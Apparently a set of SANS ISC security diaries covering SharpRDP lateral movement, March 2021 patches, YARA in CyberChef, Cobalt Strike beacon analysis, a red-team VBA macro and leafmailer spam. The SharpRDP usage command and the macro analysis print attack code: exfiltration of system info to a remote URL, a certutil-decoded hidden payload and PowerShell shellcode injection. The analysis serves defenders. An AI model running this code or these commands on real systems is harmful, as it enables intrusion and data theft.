[4] - https://create.piktochart.com/output/52653368-my-visual
[5] - https://urlscan.io/result/e02ea839-9671-4d31-a039-effd54877c0b/related/
[6] - https://urlscan.io/screenshots/205111b7-b981-48e9-9359-df55f278163b.png
[7] - https://isc.sans.edu/ipinfo.html?ip=173.231.197.145

 

With the amount of remediation folks have these days to catch malicious execution of powershell or the use of tools like psexec, red teams have to be asking themselves - what approach is next for lateral movement after you get that first foothold?

For me, if the easy stuff isn't an option, SharpRDP makes a pretty easy "next tool on the shelf"

SharpRDP takes advantage of the fact that Microsoft took a lot of pages from the Citrix ICA protocol when they put the RDP protocol together.  RDP isn't just for remote desktop - it implements "channels" which can be used for all sorts of things.  In the past, the most common use of channels in ICA is to differentiate printer traffic from interactive traffic, and apply different QOS policies to it.  But SharpRDP takes it to the next level, and allows you to start a session, and instruct it to execute code after it starts!

For the red team, this has oodles of attraction - often you don't have a GUI, and this lets you run pretty much anything you want on a remote host over a traditionally "GUI" protocol.  Since it's in an RDP session, it's an actual terminal session (not a shell), so all of your inputs and outputs are handled correctly.  While you could theoretically run a CLI terminal session over this, I'm not sure that this is implemented - I haven't needed to figure that piece out yet if it is.  

For someone on the blue team, this is a tough thing to catch - it's going to look like any other RDP session that your admins might make, executing "something" after it starts.  

What does a session look like?  It's as simple as:

>SharpRDP.exe computername=targetservername command="<some command>" username=<domain>>\<userid> password=<password string> [+] Connected to          :  targetservername [+] Execution priv type   :  non-elevated [+] Executing <some command> [+] Disconnecting from    :  targetservername [+] Connection closed     :  targetservername

Normally I'll have the "command" be a CMD file that does whatever I'm trying to accomplish - usually it's data collection of some kind, with the data coming back to the host that I have my foot-hold on.  Remember that if your command is not an actual executable (for instance, "dir" is not an executable file. it's part of cmd.exe), you will have to use "c:\windows\system32\cmd.exe /c<command>" to load the cmd interpreter prior to executing your "thing".

My go-to is single letter CMD files, so for instance t.cmd.  This file is usually homed on my foot-hold server, and sends the data back to a share on that same server.  Also the output normally has %COMPUTERNAME% in the filename so I can keep the files straight (and not have name collisions).

Protections?  LAPS is a good one - if every target host has a different password, you'll have to collect all of that first before you can use SharpRDP.  (https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/).  Really though if an attacker is far enough in to fire up RDP sessions to arbitrary hosts, harvesting the LAPS passwords isn't too tough, once you figure out that LAPS is in play.  MFA on RDP sessions is really your best bet.  I've got a few clients running this, and it's pretty slick.  Most MFA solutions allow you to extend RDP authentication, usually it's a "click OK" or a biometric confirmation (Face-ID usually) on your phone to complete the RDP session.

If you've got MFA on your servers for RDP access, then SharpRDP use is defeated nicely, and your detection that you can code into your SIEM is whatever event is generated by "failed MFA on RDP".  Your next-level protection in that case is "alert on any new registration of MFA users".  You'll want any registration of new users, or registration of new phones to existing users to go to a number of people - once MFA is a main protection, it also of course becomes a main target.

All that being said, MFA on RDP is not widely implemented in March of 2021 - there are a lot of people working on fixing this though.  The uptick in migrating VPN's and Citrix Gateways to newer MFA solutions means that it's becoming much easier to extend MFA to more and more platforms, and RDP is one of the easier and more impactful ones that we see picked.

SharpRDP is homed here:
https://github.com/0xthirteen/SharpRDP
And has a full write-up here:
https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3

 

===============
Rob VandenBrink
rob@coherentsecurity.com

This month we got patches for 122 vulnerabilities. Of these, 14 are critical, 5 are being exploited and 2 were previously disclosed. 

The highlight for this month goes to the Microsoft Exchange Server vulnerabilities that are being exploited and for which Microsoft has made available the emergency patches on March 2. If you have this software in your environment, especially if the service is exposed to the internet, and did not apply the patches, in addition to apply the patches, it is imperative that you check if your system could have been already compromised. Johannes published a diary summarizing the vulnerabilities and giving advices on how to check for evidence of compromise.

In addition to the 4 Microsoft Exchange Server vulnerabilities, there is a fifth vulnerability being exploited which have been previously disclosed. This is a RCE affecting Microsoft Edge and Internet Explorer 11 (CVE-2021-26411) on multiple Windows versions. According to the vulnerability advisory, to exploit this vulnerability, an attacker would have to convince a user to access a malicious website, like in a phishing scenario. The exploit is publicly disclosed, and exploitations were already detected. 

The highest CVSS score this month (9.90) was given to the Windows Hyper-V Remote Code Execution Vulnerability (CVE-2021-26867). The vulnerability advisory says that any Hyper-V client which is configured to use the Plan 9 file system could be vulnerable. An authenticated attacker who successfully exploited this vulnerability on a Hyper-V client could cause code to execute on the Hyper-V server.

And for the second month in a row, there is a critical RCE vulnerability affecting Windows DNS Server (CVE-2021-26897) with a CVSS of 9.80. According to the advisory, the vulnerability affects any DNS Server – being it a standalone DNS Primary Authoritative Server or a DNS Server integrated with Active Directory. It also informs that to be vulnerable, a DNS server would need to have dynamic updates enabled. 

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
Application Virtualization Remote Code Execution Vulnerability
%%cve:2021-26890%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Azure Sphere Unsigned Code Execution Vulnerability
%%cve:2021-27074%%	No	No	Less Likely	Less Likely	Critical	6.2	5.6
%%cve:2021-27080%%	No	No	Less Likely	Less Likely	Critical	9.3	9.3
Azure Virtual Machine Information Disclosure Vulnerability
%%cve:2021-27075%%	No	No	Less Likely	Less Likely	Important	6.8	6.1
Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG
%%cve:2020-27844%%	No	No	-	-	-
Chromium CVE-2021-21159: Heap buffer overflow in TabStrip
%%cve:2021-21159%%	No	No	-	-	-
Chromium CVE-2021-21160: Heap buffer overflow in WebAudio
%%cve:2021-21160%%	No	No	-	-	-
Chromium CVE-2021-21161: Heap buffer overflow in TabStrip
%%cve:2021-21161%%	No	No	-	-	-
Chromium CVE-2021-21162: Use after free in WebRTC
%%cve:2021-21162%%	No	No	-	-	-
Chromium CVE-2021-21163: Insufficient data validation in Reader Mode
%%cve:2021-21163%%	No	No	-	-	-
Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS
%%cve:2021-21164%%	No	No	-	-	-
Chromium CVE-2021-21165: Object lifecycle issue in audio
%%cve:2021-21165%%	No	No	-	-	-
Chromium CVE-2021-21166: Object lifecycle issue in audio
%%cve:2021-21166%%	No	No	-	-	-
Chromium CVE-2021-21167: Use after free in bookmarks
%%cve:2021-21167%%	No	No	-	-	-
Chromium CVE-2021-21168: Insufficient policy enforcement in appcache
%%cve:2021-21168%%	No	No	-	-	-
Chromium CVE-2021-21169: Out of bounds memory access in V8
%%cve:2021-21169%%	No	No	-	-	-
Chromium CVE-2021-21170: Incorrect security UI in Loader
%%cve:2021-21170%%	No	No	-	-	-
Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation
%%cve:2021-21171%%	No	No	-	-	-
Chromium CVE-2021-21172: Insufficient policy enforcement in File System API
%%cve:2021-21172%%	No	No	-	-	-
Chromium CVE-2021-21173: Side-channel information leakage in Network Internals
%%cve:2021-21173%%	No	No	-	-	-
Chromium CVE-2021-21174: Inappropriate implementation in Referrer
%%cve:2021-21174%%	No	No	-	-	-
Chromium CVE-2021-21175: Inappropriate implementation in Site isolation
%%cve:2021-21175%%	No	No	-	-	-
Chromium CVE-2021-21176: Inappropriate implementation in full screen mode
%%cve:2021-21176%%	No	No	-	-	-
Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill
%%cve:2021-21177%%	No	No	-	-	-
Chromium CVE-2021-21178 : Inappropriate implementation in Compositing
%%cve:2021-21178%%	No	No	-	-	-
Chromium CVE-2021-21179: Use after free in Network Internals
%%cve:2021-21179%%	No	No	-	-	-
Chromium CVE-2021-21180: Use after free in tab search
%%cve:2021-21180%%	No	No	-	-	-
Chromium CVE-2021-21181: Side-channel information leakage in autofill
%%cve:2021-21181%%	No	No	-	-	-
Chromium CVE-2021-21182: Insufficient policy enforcement in navigations
%%cve:2021-21182%%	No	No	-	-	-
Chromium CVE-2021-21183: Inappropriate implementation in performance APIs
%%cve:2021-21183%%	No	No	-	-	-
Chromium CVE-2021-21184: Inappropriate implementation in performance APIs
%%cve:2021-21184%%	No	No	-	-	-
Chromium CVE-2021-21185: Insufficient policy enforcement in extensions
%%cve:2021-21185%%	No	No	-	-	-
Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning
%%cve:2021-21186%%	No	No	-	-	-
Chromium CVE-2021-21187: Insufficient data validation in URL formatting
%%cve:2021-21187%%	No	No	-	-	-
Chromium CVE-2021-21188: Use after free in Blink
%%cve:2021-21188%%	No	No	-	-	-
Chromium CVE-2021-21189: Insufficient policy enforcement in payments
%%cve:2021-21189%%	No	No	-	-	-
Chromium CVE-2021-21190 : Uninitialized Use in PDFium
%%cve:2021-21190%%	No	No	-	-	-
DirectX Elevation of Privilege Vulnerability
%%cve:2021-24095%%	No	No	More Likely	More Likely	Important	7.0	6.1
Git for Visual Studio Remote Code Execution Vulnerability
%%cve:2021-21300%%	No	No	Less Likely	Less Likely	Critical	8.8	7.7
HEVC Video Extensions Remote Code Execution Vulnerability
%%cve:2021-24089%%	No	No	Less Likely	Less Likely	Critical	7.8	6.8
%%cve:2021-24110%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-26902%%	No	No	Less Likely	Less Likely	Critical	7.8	6.8
%%cve:2021-27047%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27048%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27049%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27050%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27051%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27061%%	No	No	Less Likely	Less Likely	Critical	7.8	6.8
%%cve:2021-27062%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Internet Explorer Memory Corruption Vulnerability
%%cve:2021-26411%%	Yes	Yes	Detected	Detected	Critical	8.8	7.9
Internet Explorer Remote Code Execution Vulnerability
%%cve:2021-27085%%	No	No	Less Likely	Less Likely	Important	8.8	7.9
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2021-27053%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27054%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Microsoft Exchange Server Remote Code Execution Vulnerability
%%cve:2021-26412%%	No	No	Less Likely	Less Likely	Critical	9.1	8.2
%%cve:2021-26854%%	No	No	Less Likely	Less Likely	Important	6.6	5.8
%%cve:2021-26855%%	No	Yes	Detected	Detected	Critical	9.1	8.4
%%cve:2021-26857%%	No	Yes	More Likely	Detected	Critical	7.8	7.2
%%cve:2021-26858%%	No	Yes	Detected	Detected	Important	7.8	7.2
%%cve:2021-27065%%	No	Yes	Detected	Detected	Critical	7.8	7.2
%%cve:2021-27078%%	No	No	Less Likely	Less Likely	Important	9.1	8.2
Microsoft Office ClickToRun Remote Code Execution Vulnerability
%%cve:2021-27058%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2021-24108%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27057%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-27059%%	No	No	Less Likely	Less Likely	Important	7.6	6.6
Microsoft Power BI Information Disclosure Vulnerability
%%cve:2021-26859%%	No	No	Less Likely	Less Likely	Important	7.7	6.7
Microsoft PowerPoint Remote Code Execution Vulnerability
%%cve:2021-27056%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Microsoft SharePoint Server Information Disclosure Vulnerability
%%cve:2021-27052%%	No	No	Less Likely	Less Likely	Important	5.3	4.8
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2021-27076%%	No	No	More Likely	More Likely	Important	8.8	7.7
Microsoft SharePoint Spoofing Vulnerability
%%cve:2021-24104%%	No	No	Less Likely	Less Likely	Important	4.6	4.2
Microsoft Visio Security Feature Bypass Vulnerability
%%cve:2021-27055%%	No	No	Less Likely	Less Likely	Important	7.0	6.1
Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability
%%cve:2021-26887%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Microsoft Windows Media Foundation Remote Code Execution Vulnerability
%%cve:2021-26881%%	No	No	Less Likely	Less Likely	Important	7.5	6.5
OpenType Font Parsing Remote Code Execution Vulnerability
%%cve:2021-26876%%	No	No	Less Likely	Less Likely	Critical	8.8	7.7
Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability
%%cve:2021-27082%%	No	No	-	-	Important	7.8	6.8
Remote Access API Elevation of Privilege Vulnerability
%%cve:2021-26882%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
%%cve:2021-27083%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Storage Spaces Controller Elevation of Privilege Vulnerability
%%cve:2021-26880%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
User Profile Service Denial of Service Vulnerability
%%cve:2021-26886%%	No	No	Less Likely	Less Likely	Important	5.5	4.8
Visual Studio Code ESLint Extension Remote Code Execution Vulnerability
%%cve:2021-27081%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability
%%cve:2021-27084%%	No	No	Less Likely	Less Likely	Important
Visual Studio Code Remote Code Execution Vulnerability
%%cve:2021-27060%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows 10 Update Assistant Elevation of Privilege Vulnerability
%%cve:2021-27070%%	No	No	Less Likely	Less Likely	Important	7.3	6.4
Windows ActiveX Installer Service Information Disclosure Vulnerability
%%cve:2021-26869%%	No	No	Less Likely	Less Likely	Important	5.5	4.8
Windows Admin Center Security Feature Bypass Vulnerability
%%cve:2021-27066%%	No	No	Less Likely	Less Likely	Important	4.3	3.8
Windows App-V Overlay Filter Elevation of Privilege Vulnerability
%%cve:2021-26860%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Container Execution Agent Elevation of Privilege Vulnerability
%%cve:2021-26865%%	No	No	Less Likely	Less Likely	Important	8.8	7.7
%%cve:2021-26891%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows DNS Server Denial of Service Vulnerability
%%cve:2021-26896%%	No	No	Less Likely	Less Likely	Important	7.5	6.5
%%cve:2021-27063%%	No	No	Less Likely	Less Likely	Important	7.5	6.5
Windows DNS Server Remote Code Execution Vulnerability
%%cve:2021-26877%%	No	No	More Likely	More Likely	Important	9.8	8.5
%%cve:2021-26893%%	No	No	Less Likely	Less Likely	Important	9.8	8.5
%%cve:2021-26894%%	No	No	Less Likely	Less Likely	Important	9.8	8.5
%%cve:2021-26895%%	No	No	Less Likely	Less Likely	Important	9.8	8.5
%%cve:2021-26897%%	No	No	More Likely	More Likely	Critical	9.8	8.5
Windows Error Reporting Elevation of Privilege Vulnerability
%%cve:2021-24090%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Event Tracing Elevation of Privilege Vulnerability
%%cve:2021-26872%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-26898%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-26901%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Event Tracing Information Disclosure Vulnerability
%%cve:2021-24107%%	No	No	Less Likely	Less Likely	Important	5.5	4.8
Windows Extensible Firmware Interface Security Feature Bypass Vulnerability
%%cve:2021-26892%%	No	No	Less Likely	Less Likely	Important	6.2	5.6
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2021-26868%%	No	No	More Likely	More Likely	Important	7.8	6.8
Windows Graphics Component Remote Code Execution Vulnerability
%%cve:2021-26861%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2021-26867%%	No	No	Less Likely	Less Likely	Critical	9.9	8.6
Windows Installer Elevation of Privilege Vulnerability
%%cve:2021-26862%%	No	No	Less Likely	Less Likely	Important	6.3	5.5
Windows Media Photo Codec Information Disclosure Vulnerability
%%cve:2021-26884%%	No	No	Less Likely	Less Likely	Important	5.5	4.8
Windows NAT Denial of Service Vulnerability
%%cve:2021-26879%%	No	No	Less Likely	Less Likely	Important	7.5	6.5
Windows Overlay Filter Elevation of Privilege Vulnerability
%%cve:2021-26874%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Print Spooler Elevation of Privilege Vulnerability
%%cve:2021-1640%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-26878%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Projected File System Elevation of Privilege Vulnerability
%%cve:2021-26870%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows UPnP Device Host Elevation of Privilege Vulnerability
%%cve:2021-26899%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Update Service Elevation of Privilege Vulnerability
%%cve:2021-26866%%	No	No	Less Likely	Less Likely	Important	7.1	6.2
Windows Update Stack Elevation of Privilege Vulnerability
%%cve:2021-26889%%	No	No	Less Likely	Less Likely	Important	7.1	6.2
Windows Update Stack Setup Elevation of Privilege Vulnerability
%%cve:2021-1729%%	No	No	Less Likely	Less Likely	Important	7.1	6.2
Windows User Profile Service Elevation of Privilege Vulnerability
%%cve:2021-26873%%	No	No	Less Likely	Less Likely	Important	7.0	6.1
Windows Virtual Registry Provider Elevation of Privilege Vulnerability
%%cve:2021-26864%%	No	No	Less Likely	Less Likely	Important	8.4	7.3
Windows WalletService Elevation of Privilege Vulnerability
%%cve:2021-26871%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-26885%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
Windows Win32k Elevation of Privilege Vulnerability
%%cve:2021-27077%%	Yes	No	Less Likely	Less Likely	Important	7.8	7.0
%%cve:2021-26863%%	No	No	More Likely	More Likely	Important	7.0	6.1
%%cve:2021-26875%%	No	No	Less Likely	Less Likely	Important	7.8	6.8
%%cve:2021-26900%%	No	No	Less Likely	Less Likely	Important	7.8	6.8

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

If you prefer a graphical user interface to match YARA rules, you can try CyberChef.

YARA is a pattern matching tool, known as "The pattern matching swiss knife".

CyberChef is a web app for all kinds of (file) analysis techniques, known as "The Cyber Swiss Army Knife".

And what do you get when you combine 2 Swiss Knifes? One really big Swiss Knife :-)

CyberChef supports YARA rules.

Here I added one YARA rule to detect Office files with VBA macros. More precisely: ole files that contain the premise of a compressed, default VBA source code header.

YARA rules that match the input (a Word document, .doc,  with VBA code in this example) are listed in the output.

Since CyberChef also has an unzip function, you can apply YARA rules on the files contained in a ZIP file (something the YARA tool itself can not do):

If you want to copy the recipes, they are below.

Just YARA:

https://gchq.github.io/CyberChef/#recipe=YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)

UNZIP + YARA:

https://gchq.github.io/CyberChef/#recipe=Unzip('',false)YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)

And know I need to close my tabs and let the browser update itself :-) .

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

I like taking a closer look at captures files posted by Brad. In his latest diary entry, we have a capture file with Cobalt Strike traffic.

With regular expression "^/....$" I look for URIs that are typical for Cobalt Strike shellcode (and Metasploit too):

Following this HTTP stream, I see data that looks encoded and has some repetitions, so this might be some kind of XOR encoding:

I export this data stream as a file:

Then pass it through my 1768.py Cobalt Strike beacon analysis tool:

And this is indeed the configuration of a beacon.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Many security researchers like to use the VirusTotal platform. The provided services are amazing: You can immediately have a clear overview of the dangerousness level of a file but... VirusTotal remains a cloud service. It means that, once you uploaded a file to scan it, you have to consider it as "lost" and available to a lot of (good or bad) people! In the SANS FOR610 training ("Reverse Engineering Malware"), we insist on the fact that you should avoid uploading a file to VT!  The best practice is to compute the file hash then search for it to see if someone else already uploaded the same sample. If you're the first to upload a file, its creator can be notified about the upload and learn that he has been detected. Don't be fooled: attackers have also access to VirusTotal and monitor activity around their malware! Note that I mention VirusTotal because it is very popular but is not the only service providing repositories of malicious files, they are plenty of alternative services to scan and store malicious files.

Another way to use those online services is to "hunt". That's what I'm doing with most of the samples that I analyze in my diaries. If you are working on the defensive side (or in a Blue team), my advice is to keep an eye on data related to your business or organization via OSINT sources). Sometimes, you can find interesting information and stay one step ahead of the attacker or... the Red team you hired to test your infrastructure!

I spotted a nice VBS macro that seems to be related to a Red team exercise. I won't disclose the hash and the script here because it contains sensitive information:

• URLs with the domain of the company performing the security assessment
• Public IP addresses used for reverse shells
• Internal resources about the targeted infrastructure (apparently, the reconnaissance phase was already completed)

Here are some pieces of interesting code:

The entry point of the macro already discloses some fun:

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
  'php rev shell and others...
  Document_Open2
  ...

Let's start with some data sent back to the attacker:

Private Sub Document_Open2()
On Error Resume Next
  uID = Environ("COMPUTERNAME") & "B3" & Environ("USERNAME")
  SavePath = Environ("TEMP") & "\tempB2" & Int((9999 - 1000 + 1) * Rnd + 1000)
  CanSend = 0
  sendSystemInfo "http://www.xxxxxxxx.com/sp/index.php?id=" & uID, CanSend
  openShell
End Sub

The domain used in the URL (obfuscated) is the domain of the security company performing the tests!

They obfuscate a script in a fake certificate and decode it with certutil.exe (classic TTP):

x = x & "-----BEGIN CERTIFICATE-----"
x = x & "JGxpbmVzID0gaXBjb25maWcgI3NhdmUgb3V0cHV0IG9mIGNvbW1hbmQgdG8gdmFy"
x = x & "aWFibGUgJGxpbmVzDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQg"
x = x & "aG9zdG5hbWUpDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQgc2hh"
[...Data removed...]
x = x & "ICRsaW5lICsgIi5pbG10LnVzIg0KICAgICRhcnJheSA9ICRhcnJheSArICRsaW5l"
x = x & "ICNhZGQgdGhlIHZhbHVlIHRvIG91ciBhcnJheQ0KfQ0KDQpmb3IgKCRpID0gMDsg"
x = x & "JGkgLWx0ICRhcnJheS5sZW5ndGg7ICRpKyspIHsNCiAgICBwaW5nICRhcnJheVsk"
x = x & "aV0NCn0="
x = x & "-----END CERTIFICATE-----"

objFile.Write x & vbCrLf
objFile.Close
Shell ("cmd /k certutil -decode " & outFile & " " & inFile), vbHide
Shell (Final & inFile), vbHide

The next technique implemented is the exfiltration of data via HTTPS. They perform this with a shellcode injected in a PowerShell threat:

$1 = '$c = ''
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';
$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$z = 0xbe,0x57,0xed,0x7b,0x36,0xda, [...Data Removed...],0x2e,0xd9,0x1b,0x87,0xf2;
$g = 0x1000;
if ($z.Length -gt 0x1000) {
  $g = $z.Length};
  $x=$w::VirtualAlloc(0,0x1000,$g,0x40);
  for ($i=0;$i -le ($z.Length-1);$i++) {
    $w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};
    $w::CreateThread(0,0,$x,0,0,0);
    for (;;) {
       Start-sleep 60
    };'
  ;
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));
$2 = "-enc ";
if([IntPtr]::Size -eq 8) {
  $3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";
  iex "& $3 $2 $e"
}
else {;
  iex "& powershell $2 $e";
}

Here is the shellcode:

The injected shellcode connects to a Comcast public IP address that, when access manually, implements a redirect to... the website of the company :-)

remnux@remnux:/MalwareZoo/20210305$ curl http://x.x.x.x
<script>
    window.location.href = "https://xxxxxxxx.com";
</script>

To conclude:

• If you're a defender, I hope this example demonstrates to you the importance of implementing OSINT techniques to spot attackers and learn what can be in the pipe.
• If you're an attacker, well, do not use your corporate domain! Cover your tracks as much as possible and don't upload your scripts on VirusTotal.

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

If there is a place where you can always find juicy information, it's your spam folder! Yes, I like spam and I don't delete my spam before having a look at it for hunting purposes. Besides emails flagged as spam, NDR or "Non-Delivery Receipt" messages also deserve some attention. One of our readers (thanks to him!) reported yesterday how he found a "spam farm" based on bounced emails. By default, SMTP is a completely open protocol. Everybody can send an email pretending to be Elon Musk or Joe Biden! That's why security control like SPF[1] or DKIM[2] can be implemented to prevent spoofed emails to be sent from anywhere. If not these controls are not implemented, you may be the victim of spam campaigns that abuse your domain name or identity. The "good" point (if we can say this) is that all NDR messages will bounce to the official mail server that you manage. That's what happened with our reader, he saw many bounced messages for unknown email addresses. Here is an example:

--1614779618-eximdsn-513689040
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  [victim]@[victimdomain]
    host [victimmx]
    SMTP error from remote mail server after end of data:
    550 5.2.0 Mail rejete. Mail rejected. ************

--1614779618-eximdsn-513689040
Content-type: message/delivery-status

Reporting-MTA: dns; fjimkopo[.]com

Action: failed
Final-Recipient: rfc822;[victim]@[victimdomain]
Status: 5.0.0
Remote-MTA: dns; [victimmx]
Diagnostic-Code: smtp; 550 5.2.0 Mail rejete. Mail rejected. ***********

--1614779618-eximdsn-513689040
Content-type: message/rfc822

Return-path: <[ourmailbox]@[ourdomain]>
Received: from admin by fjimkopo[.]com with local (Exim 4.86_2)
(envelope-from [ourmailbox]@[ourdomain])
id 1lHQYA-0002y9-UD
for [victim]@[victimdomain]; Wed, 03 Mar 2021 12:24:22 +0000
To: [victim]@[victimdomain]
Subject: *****************
X-PHP-Originating-Script: 1000:mailer1.php
Date: Wed, 3 Mar 2021 12:24:22 +0000
From: ***************** [ourmailbox]@[ourdomain]>
Reply-To: oev4228@outlook[.]com
Message-ID: <1e0b99b15ab141dc32cdf034e0bee3d4@farments[.]cf>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

What interesting information do we have in this email? We see a domain name: farments[.]cf in the Message-ID (this header is generated by the first hop in the SMTP delivery chain) but also another SMTP header added by the mailer: X-PHP-Originating-Script: 1000:mailer1.php.

Let's combine the domain with the URL in the header: hxxp://farments[.]cf/mailer1.php

This is a leafmailer[3] instance... A very popular PHP mailer used by spammers. urlscan.io reports 26 similar websites[4]:

I did the same search on VirusTotal and found more URLs:

hxxp://voceconfia[[.]]com[[.]]br/utils/leafmailer[.]php
hxxp://surmatete[[.]]com/img/p/9/5/
hxxp://hamboua1[[.]]000webhostapp[[.]]com/leafmailer[.]php
hxxp://avalonfootwears[.]com/images/leafmailernzmall[.]php
hxxps://www[.]bearchub4u[.]com/images/snd[.]php
hxxp://sech[.]cl/wp-includes/rand/leafmailer[.]php
hxxp://www[.]eudurica[.]sk/doc/leafmailer[.]php
hxxps://github[.]com/PHPMailer/apix-log-phpmailer
hxxp://thehunarfoundation[.]org/luckk[.]php
hxxp://farments[.]cf/mailer1[.]php
hxxp://elhusseinyusmleprep[.]com/wp-includes/leafmailer[.]php
hxxp://jrcasey[.]com/leaf[.]php
hxxp://secundaria[.]comprensiondelalectura[.]com/CDL/Profile/phpmailer/examples
hxxp://synergieconsulting[.]biz/leaf[.]php
hxxp://www[.]shiatsu[.]com[.]uy/archivos/pdf/2722[.]php
hxxp://rainbowisp[.]info/dot/js/leafmailer2[.]8[.]php
hxxp://aquabizarre[.]com/leaf[.]php
hxxp://neaters[.]serveusers[.]com/
hxxp://www[.]eos-numerique[.]com/sitemap/JC4Ei2aF[.]php
hxxp://themadam[.]com/inb0x[.]php
hxxp://satkom[.]id/includes/phpmailer
hxxp://a-mla[.]org/images/acts/leafmailer2[.]8[.]php
hxxp://scootelaru[.]com/leafmailer2[.]8[.]php
hxxp://eudurica[.]sk/doc/leafmailer[.]php
hxxp://secundaria[.]comprensiondelalectura[.]com/CDL/Profile/phpmailer/examples/images
hxxps://e2e[.]marketing/wp-content/themes/spacious/leaf[.]php
hxxp://mailerphppro[.]blogspot[.]com/
hxxp://www[.]fastnet[.]rw/luckk[.]php
hxxp://sanrosindia[.]com/admin_2016/library/phpmailer/docs
hxxp://emboutsdetalons[.]com/
hxxps://yanaclub[.]net/vendor/bootstrap/css/alal[.]php
hxxp://wigitest[.]com/leafmailer2[.]8[.]php
hxxp://fullfullstack[.]com/leafmailer2[.]8[.]php
hxxps://www[.]itread01[.]com/content/1542020464[.]html
hxxp://letsdoit[.]pro/wp-admin/oonnm[.]php
hxxps://www[.]leafmailer[.]pw/
hxxp://sanrosindia[.]com/admin_2016/library/phpmailer/language
hxxp://sanrosindia[.]com/admin_2016/library/phpmailer/test
